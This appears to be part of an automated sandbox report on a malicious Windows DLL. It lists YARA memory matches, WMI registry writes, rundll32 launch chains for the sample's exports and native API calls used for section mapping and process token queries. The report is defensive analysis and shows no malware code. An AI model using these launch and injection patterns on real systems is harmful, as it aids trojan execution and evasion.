                      Source: Yara match | File source: 00000006.00000003.533401474.0000000005BD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.593657647.000000000312D000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000006.00000003.533448207.0000000005BD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000002.681690642.0000000002FB0000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: loaddll32.exe PID: 7088, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 4432, type: MEMORYSTR
                      Source: Yara match | File source: 2.2.loaddll32.exe.2d494a0.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 10.3.rundll32.exe.10ba31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 5.3.rundll32.exe.10da31a.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 6.3.rundll32.exe.318a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 6.2.rundll32.exe.6e8d0000.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 6.3.rundll32.exe.318a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 9.2.rundll32.exe.6e8d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 10.3.rundll32.exe.10ba31a.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.2.loaddll32.exe.6e8d0000.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 6.2.rundll32.exe.31a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 9.0.rundll32.exe.6e8d0000.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.2.loaddll32.exe.2d494a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.2.loaddll32.exe.a30000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 6.2.rundll32.exe.53794a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 6.2.rundll32.exe.53794a0.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 9.3.rundll32.exe.109a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 9.0.rundll32.exe.6e8d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.3.loaddll32.exe.b3a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 9.3.rundll32.exe.109a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.3.loaddll32.exe.b3a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 5.3.rundll32.exe.10da31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000005.00000003.431870114.00000000010D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000009.00000003.446004934.0000000001090000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.468068395.0000000000B30000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000006.00000002.682624549.0000000005379000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000A.00000003.469511127.00000000010B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000006.00000003.430400747.0000000003180000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000002.681378105.0000000002D49000.00000004.00000040.sdmp, type: MEMORY

                      System Summary:

                      Writes or reads registry keys via WMI
                      Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
                      Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Writes registry values via WMI
                      Source: C:\Windows\System32\loaddll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\System32\loaddll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: 616412739e268.dll | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6084 -s 880
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 2_2_6E8D21B4
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 2_2_00A34C40
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 2_2_00A3AF24
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 2_2_00A32B76
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 2_2_6E8E5600
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 2_2_6E91D630
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 2_2_6E933CCE
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 2_2_6E91B597
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 2_2_6E92A2B1
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 2_2_6E90E8C0
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_031AAF24
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_031A2B76
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_031A4C40
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_6E8E5600
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_6E91D630
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_6E933CCE
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_6E91B597
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_6E92A2B1
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_6E93FA78
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_6E90E8C0
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_6E8E5600
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_6E91D630
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_6E933CCE
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_6E91B597
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_6E92A2B1
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_6E90E8C0
                      Source: C:\Windows\System32\loaddll32.exe | Code function: String function: 6E90ABD1 appears 91 times
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: String function: 6E90AEC0 appears 36 times
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: String function: 6E90ABD1 appears 182 times
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: String function: 6E918487 appears 34 times
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 2_2_6E8D13B8 GetProcAddress,NtCreateSection,memset,
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 2_2_6E8D15C6 SetThreadPriority,NtQuerySystemInformation,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,GetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 2_2_6E8D1273 NtMapViewOfSection,
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 2_2_6E8D23D5 NtQueryVirtualMemory,
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 2_2_00A35D10 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 2_2_00A3B149 NtQueryVirtualMemory,
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_031A5D10 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_031AB149 NtQueryVirtualMemory,
                      Source: 616412739e268.dll | ReversingLabs: Detection: 24%
                      Source: 616412739e268.dll | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll32.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknown | Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\616412739e268.dll'
                      Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\616412739e268.dll',#1
                      Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\616412739e268.dll,BeGrass
                      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\616412739e268.dll',#1
                      Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\616412739e268.dll,Fieldeight
                      Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\616412739e268.dll,Often
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6084 -s 880
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6012 -s 628
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4360 -s 848
                      Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\616412739e268.dll',#1
                      Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\616412739e268.dll,BeGrass
                      Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\616412739e268.dll,Fieldeight
                      Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\616412739e268.dll,Often
                      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\616412739e268.dll',#1
                      Source: C:\Windows\System32\loaddll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
                      Source: C:\Windows\SysWOW64\WerFault.exe | File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER923.tmp
                      Source: classification engine | Classification label: mal88.troj.evad.winDLL@14/12@15/5
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 2_2_00A34A03 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,
                      Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\616412739e268.dll,BeGrass
                      Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6084
                      Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6012
                      Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4360
                      Source: C:\Windows\System32\loaddll32.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\System32\loaddll32.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\rundll32.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\rundll32.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\WerFault.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\WerFault.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\WerFault.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\WerFault.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\WerFault.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\WerFault.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\rundll32.exe | Automated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exe | Automated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exe | Automated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exe | Automated click: OK
                      Source: 616412739e268.dll | Static PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: 616412739e268.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: WinTypes.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: CoreUIComponents.pdbm source: WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp
                      Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000012.00000003.512757013.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.524272653.0000000004F51000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.521737000.0000000000905000.00000004.00000001.sdmp
                      Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: sfc_os.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000012.00000003.512757013.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.524096098.00000000050E2000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.534288689.0000000004BF1000.00000004.00000001.sdmp
                      Source: Binary string: shlwapi.pdb7 source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp
                      Source: Binary string: CoreMessaging.pdb_ source: WerFault.exe, 00000012.00000003.512855279.0000000005701000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524487257.00000000050F4000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: shlwapi.pdb.{Y@e source: WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000012.00000003.512757013.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.524272653.0000000004F51000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.534288689.0000000004BF1000.00000004.00000001.sdmp
                      Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000012.00000003.512884902.00000000056F0000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524424631.00000000050E0000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.534997443.0000000004BC0000.00000004.00000040.sdmp
                      Source: Binary string: wntdll.pdb source: WerFault.exe, 00000012.00000003.512757013.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.524272653.0000000004F51000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.521724684.00000000008FF000.00000004.00000001.sdmp
                      Source: Binary string: cryptbase.pdbf{ source: WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: combase.pdbl{ source: WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: imagehlp.pdb/ source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp
                      Source: Binary string: CoreMessaging.pdb source: WerFault.exe, 00000012.00000003.512855279.0000000005701000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524487257.00000000050F4000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: shcore.pdb source: WerFault.exe, 00000012.00000003.512896544.00000000056F4000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524096098.00000000050E2000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535030009.0000000004BC4000.00000004.00000040.sdmp
                      Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000012.00000003.512757013.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.524272653.0000000004F51000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.534288689.0000000004BF1000.00000004.00000001.sdmp
                      Source: Binary string: fltLib.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: advapi32.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: rundll32.pdbk source: WerFault.exe, 00000012.00000003.512757013.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.534288689.0000000004BF1000.00000004.00000001.sdmp
                      Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: oCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 00000012.00000002.529162256.0000000002F92000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000002.551332599.0000000000632000.00000004.00000001.sdmp
                      Source: Binary string: shell32.pdb source: WerFault.exe, 00000012.00000003.512757013.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.524096098.00000000050E2000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.534288689.0000000004BF1000.00000004.00000001.sdmp
                      Source: Binary string: winspool.pdb6{1@ source: WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: imagehlp.pdb0{?@ source: WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: msvcp_win.pdbk source: WerFault.exe, 00000016.00000003.524096098.00000000050E2000.00000004.00000040.sdmp
                      Source: Binary string: advapi32.pdb({G@r source: WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: ntmarta.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000012.00000003.512757013.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.524096098.00000000050E2000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.534288689.0000000004BF1000.00000004.00000001.sdmp
                      Source: Binary string: bcrypt.pdb0 source: WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: wimm32.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000012.00000003.512757013.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.524272653.0000000004F51000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.534288689.0000000004BF1000.00000004.00000001.sdmp
                      Source: Binary string: CoreUIComponents.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: mpr.pdb source: WerFault.exe, 00000012.00000003.512884902.00000000056F0000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524424631.00000000050E0000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.534997443.0000000004BC0000.00000004.00000040.sdmp
                      Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000012.00000003.512757013.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.524272653.0000000004F51000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.534288689.0000000004BF1000.00000004.00000001.sdmp
                      Source: Binary string: setupapi.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: wUxTheme.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: imagehlp.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: upwntdll.pdb source: WerFault.exe, 00000016.00000003.516470114.0000000004CA2000.00000004.00000001.sdmp
                      Source: Binary string: dwmapi.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: shcore.pdbk source: WerFault.exe, 00000012.00000003.512896544.00000000056F4000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524096098.00000000050E2000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535030009.0000000004BC4000.00000004.00000040.sdmp
                      Source: Binary string: wntdll.pdb( source: WerFault.exe, 00000018.00000003.521724684.00000000008FF000.00000004.00000001.sdmp
                      Source: Binary string: mpr.pdbn source: WerFault.exe, 00000016.00000003.524424631.00000000050E0000.00000004.00000040.sdmp
                      Source: Binary string: profapi.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: winspool.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000012.00000003.512757013.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.524272653.0000000004F51000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.534288689.0000000004BF1000.00000004.00000001.sdmp
                      Source: Binary string: shell32.pdbk source: WerFault.exe, 00000016.00000003.524096098.00000000050E2000.00000004.00000040.sdmp
                      Source: Binary string: sechost.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: propsys.pdbQ source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp
                      Source: Binary string: propsys.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: wimm32.pdbA source: WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp
                      Source: Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000012.00000003.512896544.00000000056F4000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524096098.00000000050E2000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535030009.0000000004BC4000.00000004.00000040.sdmp
                      Source: Binary string: ucrtbase.pdbk source: WerFault.exe, 00000016.00000003.524096098.00000000050E2000.00000004.00000040.sdmp
                      Source: Binary string: wUxTheme.pdb<{K@a source: WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: advapi32.pdb9 source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp
                      Source: Binary string: powrprof.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: msctf.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: fltLib.pdb[ source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp
                      Source: Binary string: ole32.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: TextInputFramework.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: AcLayers.pdb source: WerFault.exe, 00000012.00000003.512757013.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.524272653.0000000004F51000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.534288689.0000000004BF1000.00000004.00000001.sdmp
